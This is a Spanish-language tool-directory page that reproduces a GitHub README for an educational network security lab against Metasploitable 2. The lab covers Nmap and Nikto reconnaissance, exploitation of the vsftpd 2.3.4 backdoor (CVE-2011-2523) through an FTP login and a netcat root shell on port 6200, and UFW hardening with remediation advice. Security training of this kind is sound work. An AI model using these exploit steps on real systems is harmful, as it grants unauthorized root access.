Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
network-security-lab — Laboratorio virtual controlado de ataque y defensa — explotación de CVE-2011-2523, reconocimiento con Nmap, escaneo con Nikto, endurecimiento con UFW en Metasploitable 2 | Kitploit
Herramientas/GitHubGitHub/amirmuhammadmarvi/network-security-lab
ReconocimientoEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónAuditoría de ConfiguraciónSeguridad WebSeguridad de RedesPruebas de PenetraciónAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Labs y Práctica
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

Laboratorio virtual controlado de ataque y defensa — explotación de CVE-2011-2523, reconocimiento con Nmap, escaneo con Nikto, endurecimiento con UFW en Metasploitable 2

Ver Repositorio
3hace 3 mesesAún no revisado
Compartir

🔬 Laboratorio de Seguridad en Redes

Un entorno virtual controlado que simula escenarios reales de ataque y defensa

Python Platform CVE Status


📋 Resumen

Este laboratorio simula una prueba de penetración del mundo real y un ejercicio de endurecimiento defensivo en un entorno virtual completamente aislado. Demuestra el ciclo de vida completo de la seguridad ofensiva, desde el reconocimiento hasta la explotación, y los controles defensivos que mitigarían cada riesgo.

Resultado clave: Se obtuvo acceso root completo en la máquina objetivo en menos de 60 segundos explotando una puerta trasera conocida, sin credenciales ni herramientas especiales.


🏗 Entorno del Laboratorio

ComponenteDetalles
HipervisorVMware Workstation
RedSolo anfitrión / NAT (totalmente aislada)
SO AtacanteUbuntu 24 LTS
SO ObjetivoMetasploitable 2 (Linux 2.6.x)
IP Atacante192.168.148.255
IP Objetivo192.168.148.130

🎯 Metodología

root@kitploit:~
Reconocimiento  →  Escaneo  →  Explotación  →  Defensa y endurecimiento

🔍 Fase 1 — Reconocimiento

Escaneo de puertos con Nmap

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

Hallazgos clave — 23 puertos abiertos en total:

PuertoServicioVersiónRiesgo
21FTPvsftpd 2.3.4🔴 CRÍTICO — Puerta trasera conocida (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 MEDIO — Desactualizado
23TelnetLinux telnetd🟠 ALTO — Protocolo en texto plano
80HTTPApache 2.2.8🟠 ALTO — Múltiples CVE
1524BindshellShell root🔴 CRÍTICO — Shell root abierto
3306MySQL5.0.51a🟠 ALTO — Base de datos expuesta
5900VNCProtocolo 3.3🟠 ALTO — Autenticación débil
6667IRCUnrealIRCd🔴 CRÍTICO — Puerta trasera conocida

Escaneo web con Nikto

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

18 vulnerabilidades encontradas, incluyendo:

  • phpMyAdmin expuesto públicamente
  • phpinfo.php filtrando la configuración completa del servidor
  • HTTP TRACE habilitado (ataques XST)
  • Indexación de directorios habilitada en /doc/, /test/
  • Apache 2.2.8 y PHP 5.2.4 desactualizados

💥 Fase 2 — Explotación

CVE-2011-2523 — Puerta trasera de vsftpd 2.3.4

vsftpd 2.3.4 contiene una puerta trasera introducida mediante un compromiso en la cadena de suministro. Enviar un nombre de usuario que termine con :) hace que el servidor abra un shell root en el puerto 6200.

root@kitploit:~
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:)   Password: anything

# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200

# Step 3 — Verify access
whoami
# → root

Resultado: Se obtuvo acceso completo a nivel de root en < 60 segundos — sin credenciales, sin necesidad de frameworks de explotación.

Impacto: Un atacante con acceso root puede leer/modificar/eliminar cualquier archivo, instalar malware, exfiltrar datos o pivotar a otros hosts en la red.


🛡 Fase 3 — Defensa y endurecimiento

Cortafuegos UFW — Política de denegación por defecto

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # SSH only
sudo ufw status verbose

Recomendaciones de corrección

VulnerabilidadSolución
Puerta trasera vsftpd 2.3.4Actualizar a vsftpd 3.x o migrar a SFTP
Shell root abierto (puerto 1524)Deshabilitar inmediatamente, auditar la instalación
Telnet (puerto 23)Deshabilitar — forzar solo SSH
phpMyAdmin expuestoRestringir por IP, requerir autenticación fuerte
MySQL expuesto (puerto 3306)Enlazar a localhost, bloquear acceso externo
VNC expuesto (puerto 5900)Restringir por IP o deshabilitar
Indexación de directoriosApache: Options -Indexes
HTTP TRACEApache: TraceEnable off
Apache + PHP desactualizadosActualizar a versiones LTS soportadas

📄 Informe completo

Consulte report.md para la evaluación completa: metodología completa, salidas de comandos, tabla de hallazgos, pasos de explotación y todas las recomendaciones de corrección.


⚠️ Aviso legal

Este laboratorio se realizó en un entorno virtual completamente aislado utilizando software intencionalmente vulnerable (Metasploitable 2). Todas las técnicas son con fines exclusivamente educativos y de portafolio. No las replique en sistemas que no sean de su propiedad o para los que no tenga permiso explícito por escrito.


🛠 Herramientas utilizadas

HerramientaPropósito
NmapEscaneo de puertos y detección de servicios
NiktoEscaneo de vulnerabilidades web
NetcatConexión al shell de la puerta trasera
UFWConfiguración de cortafuegos basado en host
Cliente FTPDesencadenar la puerta trasera de vsftpd
VMware WorkstationVirtualización del laboratorio

Autor: Amir Mohammad Marwi

Portfolio LinkedIn GitHub

Descargar herramienta